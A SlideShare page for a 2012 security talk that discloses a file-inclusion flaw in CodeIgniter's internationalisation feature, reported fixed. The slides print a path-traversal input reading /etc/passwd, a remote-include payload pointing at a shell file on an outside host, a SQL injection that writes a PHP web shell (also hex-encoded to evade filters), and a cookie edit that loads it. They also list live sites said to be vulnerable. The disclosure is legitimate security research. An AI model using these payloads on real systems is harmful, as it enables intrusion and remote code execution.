Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
20 May 2012               CodeIgniter             i18n Code InjectionAbbas Naderi (aka AbiusX)OWASP Chapter Leader of Iran...
Understand the Context
PHP•   Mostly used SSI (75%)•   17 Years Maturity•   Open Source Nature•   Rapid Develop/Deploy•   Secure Core•   Insecure...
PHP Frameworks•   PHP low level web support•   Incorporation of Frameworks•   Much Used and Mature -> Secure•   Huge Codeb...
CodeIgniter• Most used Mid-level Framework
Internationalization• i18n importance today• Difficult implementation:   – File-based (Wordpress, eFront, …)   – Database ...
Remote File Inclusion
RFI at a glance• 3rd Most Common Vuln. in Top Ten  2007 : Malicious File Inclusion• Not in Top Ten 2010 : Mostly  Understo...
RFI Example<?php$page = $_GET[„page‟];include “./pages/{$page}.php”;Malicious Input:Mysite.com?page=../../../etc/passwd%00...
RFI CheatsheetUse null character on input to terminate string:include “./{$page}.you.cant.rfi.me.php”;Use absolute paths i...
allow_url_include
Filter Parameters• CodeIgniter has the least found exploits on all  major PHP frameworks (Commercial Codebase)• CodeIgnite...
Internationalization
Internationalization (II)
Local File Inclusion• Useful to extract info. from target  system  – /etc/passwd  – ./config/database.php• Easy to exploit
Local Code Inclusion• Requires a blind injection:  – „” and 1=0 union select “<?php echo shell_exec($_REQUEST[q]);       i...
Local Code Inclusion (II)• Now change cookie from  –   a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aa55f87c8b18    ...
Remote Code Inclusion• Look at the code:     include($package_path.language/.$idiom./.$langfile);• You a hacker? tell me h...
Remote Code Inclusion (II)$this->load->add_package_path()Adding a package path instructs the Loader class toprepend a give...
Demonstration
CodeIgniter + i18n• More than 240 sites discovered:  – http://www.sedoparking.com  – http://bambooinvoice.org/  – http://w...
Questions?                    Feedback?Abbas Naderi (aka AbiusX)OWASP Chapter Leader of IranISSECO Memberabiusx@acm.org / ...
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security Flaw
Upcoming SlideShare
Loading in …5
×

CodeIgniter i18n Security Flaw

3,039 views

Published on

This demonstrates a LFI (local file inclusion) security flaw in internationalization feature of CodeIgniter, the famous PHP framework.
This was coined by me, and used to exploit numerous CodeIgniter powered websites. Currently reported and fixed.

Published in: Technology
  • For creating an international or multilingual website in CodeIgniter, it is better to use the language classes. The language library of CodeIgniter doesn't have any security flaw like that. The process of using these classes in your code is really simple as well, example: https://www.cloudways.com/blog/multi-language-codeigniter/
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

CodeIgniter i18n Security Flaw

  1. 1. 20 May 2012 CodeIgniter i18n Code InjectionAbbas Naderi (aka AbiusX)OWASP Chapter Leader of IranISSECO Memberabbas.naderi@owasp.org / me@abiusx.com
  2. 2. Understand the Context
  3. 3. PHP• Mostly used SSI (75%)• 17 Years Maturity• Open Source Nature• Rapid Develop/Deploy• Secure Core• Insecure Libraries• Low Level Web Development *
  4. 4. PHP Frameworks• PHP low level web support• Incorporation of Frameworks• Much Used and Mature -> Secure• Huge Codebase -> Insecure• Developers, not Security guys• Security-Oriented Frameworks (OWASP ESAPI)
  5. 5. CodeIgniter• Most used Mid-level Framework
  6. 6. Internationalization• i18n importance today• Difficult implementation: – File-based (Wordpress, eFront, …) – Database (jFramework) – Code-based (CodeIgniter, …)• Obsolete consumers -> No testing
  7. 7. Remote File Inclusion
  8. 8. RFI at a glance• 3rd Most Common Vuln. in Top Ten 2007 : Malicious File Inclusion• Not in Top Ten 2010 : Mostly Understood and Fixed• Highest Impact (Run Arbitrary Code!)• Common on Interpreted Languages• Most Common in PHP (Why?)
  9. 9. RFI Example<?php$page = $_GET[„page‟];include “./pages/{$page}.php”;Malicious Input:Mysite.com?page=../../../etc/passwd%00Where current dir is /var/wwwinclude “/var/www/pages/../../../etc/passwd”;= include “/etc/passwd”; //show it on screen
  10. 10. RFI CheatsheetUse null character on input to terminate string:include “./{$page}.you.cant.rfi.me.php”;Use absolute paths if input initiates include:include “{$_GET[‘page’]}”;page=http://abx.ir/shell.txt%00
  11. 11. allow_url_include
  12. 12. Filter Parameters• CodeIgniter has the least found exploits on all major PHP frameworks (Commercial Codebase)• CodeIgniter filters dangerous characters such as ‘ , “, /, ?, <, > on GET parameters, to prevent most XSS and Injection attacks.• CodeIgniter has central module loader, and MVC pattern, preventing most RFIs.
  13. 13. Internationalization
  14. 14. Internationalization (II)
  15. 15. Local File Inclusion• Useful to extract info. from target system – /etc/passwd – ./config/database.php• Easy to exploit
  16. 16. Local Code Inclusion• Requires a blind injection: – „” and 1=0 union select “<?php echo shell_exec($_REQUEST[q]); into outfile “/tmp/sales_lang.php” -- – CodeIgniter filters <? From input – „ and 1=0 union select unhex(“3c3f706870206563686f207368656c6c5f6578656328245f 524551554553545b715d29″) into outfile “/tmp/common_lang.php” -- – Caution: into outfile does not overwrite! – Where to find blind injection?
  17. 17. Local Code Inclusion (II)• Now change cookie from – a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aa55f87c8b18 afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A% 22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22M ozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3 A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A %22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A% 22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A% 22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965b ad – To lang%22%3Bs%3A2%3A%22../../../../../tmp
  18. 18. Remote Code Inclusion• Look at the code: include($package_path.language/.$idiom./.$langfile);• You a hacker? tell me how!
  19. 19. Remote Code Inclusion (II)$this->load->add_package_path()Adding a package path instructs the Loader class toprepend a given path for subsequent requests forresources. As an example, the "Foo Bar" applicationpackage above has a library named Foo_bar.php. Inour controller, wed do the following:$this->load->add_package_path(APPPATH.third_party/foo_bar/);http://codeigniter.com/user_guide/libraries/loader.html
  20. 20. Demonstration
  21. 21. CodeIgniter + i18n• More than 240 sites discovered: – http://www.sedoparking.com – http://bambooinvoice.org/ – http://www.haughin.com/ – http://www.rapyd.com/ – http://code-igniter.ru/• And tons more…
  22. 22. Questions? Feedback?Abbas Naderi (aka AbiusX)OWASP Chapter Leader of IranISSECO Memberabiusx@acm.org / me@abiusx.com

×